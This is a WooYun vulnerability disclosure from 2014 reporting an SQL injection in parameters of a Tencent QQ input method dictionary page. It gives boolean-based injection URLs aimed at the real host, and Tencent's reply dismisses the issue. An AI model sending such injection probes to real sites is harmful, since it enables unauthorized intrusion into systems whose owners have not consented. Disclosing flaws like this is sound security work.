漏洞概要关注数(4)关注此漏洞

漏洞概要
关注数(
4
)
关注此漏洞
缺陷编号：
WooYun-2014-88484
漏洞标题：		QQ输入法某处SQL注入
相关厂商：
腾讯
漏洞作者：
Airbasic
提交时间：		2014-12-24 23:30
公开时间：		2014-12-25 10:39
漏洞类型：		SQL注射漏洞
危害等级：		中
自评Rank：		8
漏洞状态：		
															漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源：
http://www.wooyun.org
Tags标签：	
								无
0
人收藏
收藏
分享漏洞：
0
漏洞详情
披露状态：
2014-12-24：	细节已通知厂商并且等待厂商处理中
2014-12-25：	厂商已经主动忽略漏洞，细节向公众公开
简要描述：
QQ输入法某处SQL注入
详细说明：
sort1 sort2 都是注入点
code 区域
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=1%23
code 区域
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=2%23
漏洞证明：
code 区域
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=1%23
code 区域
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=2%23
修复方案：
= =干吧爹
版权声明：转载请注明来源
Airbasic
@
乌云
漏洞回应
厂商回应：
危害等级：无影响厂商忽略
忽略时间：2014-12-25 10:39
厂商回复：
非常感谢您的报告，经评估该问题并不存在，故此忽略。如果您有任何的疑问，欢迎反馈，我们会有专人跟进处理。
漏洞Rank：10 (WooYun评价)
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分